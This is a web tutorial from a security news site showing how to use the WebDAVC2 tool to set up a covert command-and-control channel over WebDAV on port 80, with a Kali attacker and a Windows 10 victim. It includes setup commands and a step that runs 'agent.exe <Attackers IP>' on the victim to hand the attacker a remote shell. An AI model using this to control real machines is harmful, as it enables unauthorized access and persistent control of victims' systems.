Thursday, December 5, 2024
HomeMaintaining AccessWebDAV to Run a Secret Communication Channel between Victim and Control Server

WebDAV to Run a Secret Communication Channel between Victim and Control Server

Published on

SIEM as a Service

WebDAV(Web Distributed Authoring and Versioning) is the extended framework of HTTP protocol which includes more features such as clients can connect to the web server and perform actions like a modification of files on the web server.

It works on port 80 and 443.So we can use web server ports as command and control channel to obtain the shell.To perform this attack download the WebDAVC2 tool Here.

Here I have used Kali Linux(Attacker Machine) and Victim Machine (Windows 10)

- Advertisement - SIEM as a Service

Installation & Configuration

Git clone this repository:

  •  root@kali:~# git clone https://github.com/Arno0x/WebDAVC2

Change directory into the WebDavC2 folder:

  • root@kali:~# cd WebDAVC2

Give the execution permission to the script:

  • root@kali:~# chmod +x webDavC2.py

ATTACKER MACHINE – WebDAV

  • Run the tool and provide the remote web server IP.Here I have given Windows 10 machine IP address.
WebDAV
  • Above Image shows scripts is actively looking for port 80, once the client is connected we should get the shell.

Must Read Complete Kali Tools tutorials from Information gathering to Forensics

VICTIM MACHINE

  • Open the agent.exe executable in cmd of windows 10 machine.
WebDAV
  • Run CMD and Execute the command:agent.exe <Attackers IP> as the listener.
WebDAV
  • Above figure shows victim agent is connected to attackers IP.

BACK TO ATTACKERS MACHINE

  • Once the Listener is executed on my windows 10 victim machine, Here we got a shell with port 80.
WebDAV
  • Let us try some windows commands to control of victim pc.
WebDAV
WebDAV
  • Above figures show Windows 10 is accessible via port 80 on attackers machine.

NOTE: This script uses PROPFIND feature of WebDev used to retrieve remote system.

Therefore WebDev can be used as the C2 communication channel to maintain access to victim machine or delivering malicious payloads.Happy Hacking !!!

Latest articles

One Identity Named Winner of the Coveted Top InfoSec Innovator Awards for 2024

One Identity named Hot Company: Privileged Access Management (PAM) in 12th Cyber Defense Magazine’s...

HCL DevOps Deploy / Launch Vulnerability Let Embed arbitrary HTML tags

Recently identified by security researchers, a new vulnerability in HCL DevOps Deploy and HCL...

CISA Warns of Zyxel Firewalls, CyberPanel, North Grid, & ProjectSend Flaws Exploited in Wild

The Cybersecurity and Infrastructure Security Agency (CISA) has issued warnings about several vulnerabilities being...

HackSynth : Autonomous Pentesting Framework For Simulating Cyberattacks

HackSynth is an autonomous penetration testing agent that leverages Large Language Models (LLMs) to...

API Security Webinar

72 Hours to Audit-Ready API Security

APIs present a unique challenge in this landscape, as risk assessment and mitigation are often hindered by incomplete API inventories and insufficient documentation.

Join Vivek Gopalan, VP of Products at Indusface, in this insightful webinar as he unveils a practical framework for discovering, assessing, and addressing open API vulnerabilities within just 72 hours.

Discussion points

API Discovery: Techniques to identify and map your public APIs comprehensively.
Vulnerability Scanning: Best practices for API vulnerability analysis and penetration testing.
Clean Reporting: Steps to generate a clean, audit-ready vulnerability report within 72 hours.

More like this

ICMP Shell- Secret Command and Control Channel to Control Victims Machine Using Ping

Corporate firewalls can block reverse and bind TCP connections. However, corporate firewalls are behind internal...

Bithumb Hacked – Hackers Transferred $20 Million Worth Cryptocurrencies From Bithumb Wallet

Bithumb Hacked 3rd time, Yes, One of the worlds largest cryptocurrency exchange Bithumb Hacked...